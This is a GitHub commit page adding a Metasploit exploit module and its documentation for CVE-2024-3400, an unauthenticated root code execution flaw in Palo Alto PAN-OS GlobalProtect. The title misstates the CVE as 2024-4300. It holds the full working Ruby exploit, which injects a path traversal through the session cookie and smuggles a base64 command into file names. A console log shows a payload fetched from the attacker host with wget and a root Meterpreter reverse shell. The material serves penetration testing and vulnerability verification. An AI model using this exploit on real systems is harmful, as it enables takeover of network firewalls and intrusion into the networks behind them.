-
Notifications
You must be signed in to change notification settings - Fork 14.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #19101, Exploit module for CVE-2024-4300 - Palo Alto Networks PA…
…N-OS Merge branch 'land-19101' into upstream-master
- Loading branch information
Showing
2 changed files
with
255 additions
and
0 deletions.
There are no files selected for viewing
112 changes: 112 additions & 0 deletions
112
documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,112 @@ | ||
## Vulnerable Application | ||
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that | ||
allow an unauthenticated attacker to create arbitrarily named files and execute | ||
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or | ||
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions | ||
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1, | ||
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to | ||
one hour to execute, depending on how often the telemetry service is set to run. | ||
|
||
For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis). | ||
|
||
## Testing | ||
Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the | ||
web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal) | ||
and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway). | ||
With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second | ||
network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application | ||
is the target of the exploit, and the '/global-protect/login.esp' page should be accessible. | ||
|
||
The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0, | ||
and 11.1 versions. | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. `use exploit/linux/http/panos_telemetry_cmd_exec` | ||
3. `set RHOST <TARGET_IP_ADDRESS>` | ||
4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp` | ||
5. `set LHOST eth0` | ||
6. `check` | ||
7. `exploit` | ||
|
||
## Scenarios | ||
|
||
### Linux Command | ||
|
||
Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command. | ||
|
||
Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period. | ||
|
||
Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP. | ||
|
||
``` | ||
msf6 > use exploit/linux/http/panos_telemetry_cmd_exec | ||
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options | ||
Module options (exploit/linux/http/panos_telemetry_cmd_exec): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
TARGETURI /global-protect/login.esp yes An existing web application endpoint | ||
VHOST no HTTP server virtual host | ||
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME EkcxbboZMyD no Name to use on remote system when storing payload; cannot contain spaces or slashes | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces | ||
LHOST yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Default | ||
View the full module info with the info, or info -d command. | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226 | ||
RHOSTS => 192.168.50.226 | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25 | ||
LHOST => 192.168.50.25 | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585 | ||
LPORT => 8585 | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check | ||
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted | ||
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 192.168.50.25:8585 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted | ||
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload | ||
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled | ||
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500 | ||
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target | ||
meterpreter > getuid | ||
Server username: root | ||
meterpreter > sysinfo | ||
Computer : 192.168.50.216 | ||
OS : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > | ||
``` |
143 changes: 143 additions & 0 deletions
143
modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,143 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::FileDropper | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution', | ||
'Description' => %q{ | ||
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that | ||
allow an unauthenticated attacker to create arbitrarily named files and execute | ||
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or | ||
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions | ||
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1, | ||
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to | ||
one hour to execute, depending on how often the telemetry service is set to run. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'remmons-r7', # Metasploit module | ||
'sfewer-r7' # Metasploit module | ||
], | ||
'References' => [ | ||
['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier | ||
['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory | ||
['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation | ||
['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis | ||
], | ||
'DisclosureDate' => '2024-04-12', | ||
'Platform' => [ 'linux', 'unix' ], | ||
'Arch' => [ARCH_CMD], | ||
'Privileged' => true, # Executes as root on Linux | ||
'Targets' => [ [ 'Default', {} ] ], | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', | ||
'FETCH_COMMAND' => 'WGET', | ||
'RPORT' => 443, | ||
'SSL' => true, | ||
'FETCH_WRITABLE_DIR' => '/var/tmp', | ||
'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour | ||
}, | ||
'DefaultTarget' => 0, | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [REPEATABLE_SESSION], | ||
'SideEffects' => [ | ||
IOC_IN_LOGS, | ||
# The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created | ||
# The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log | ||
# Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests | ||
# The "device_telemetry_*.log" files in /var/log/pan will log the command being injected | ||
ARTIFACTS_ON_DISK | ||
# Several 0 length files are created in the following directories during checks and exploitation: | ||
# - /opt/panlogs/tmp/device_telemetry/hour/ | ||
# - /opt/panlogs/tmp/device_telemetry/minute/ | ||
# - /var/appweb/sslvpndocs/global-protect/portal/fonts/ | ||
] | ||
} | ||
) | ||
) | ||
|
||
register_options( | ||
[ | ||
OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']), | ||
] | ||
) | ||
end | ||
|
||
def check | ||
# Try to create a new empty file in an accessible directory with the exploit primitive | ||
# This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory | ||
file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2" | ||
touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}") | ||
|
||
# Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively | ||
res_check_created = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name) | ||
) | ||
|
||
return CheckCode::Unknown('Connection failed') unless res_check_created | ||
|
||
res_check_not_created = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}") | ||
) | ||
|
||
return CheckCode::Unknown('Connection failed') unless res_check_not_created | ||
|
||
if (res_check_created.code != 403) || (res_check_not_created.code != 404) | ||
return CheckCode::Safe('Arbitrary file write did not succeed') | ||
end | ||
|
||
CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted") | ||
end | ||
|
||
def touch_file(file) | ||
# Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location | ||
fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';' | ||
|
||
send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path), | ||
'headers' => { | ||
'Cookie' => "SESSID=./../../../..#{file}" | ||
} | ||
) | ||
end | ||
|
||
def exploit | ||
# Encode the shell command payload as base64, then embed it in the appropriate exploitation context | ||
# Since payloads cannot contain spaces, ${IFS} is used as a separator | ||
cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-" | ||
|
||
# Create maliciously named files in both telemetry directories that might be used by affected versions | ||
# Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'. | ||
# It's possible that the payload will execute twice, but we've only observed one location working during testing | ||
files = [ | ||
"/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`", | ||
"/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`" | ||
] | ||
|
||
files.each do |file_path| | ||
vprint_status("Creating file at #{file_path}") | ||
touch_file(file_path) | ||
|
||
# Must register for clean up here instead of within touch_file, since touch_file is used in the check | ||
register_file_for_cleanup(file_path) | ||
end | ||
|
||
print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload') | ||
print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled') | ||
end | ||
end |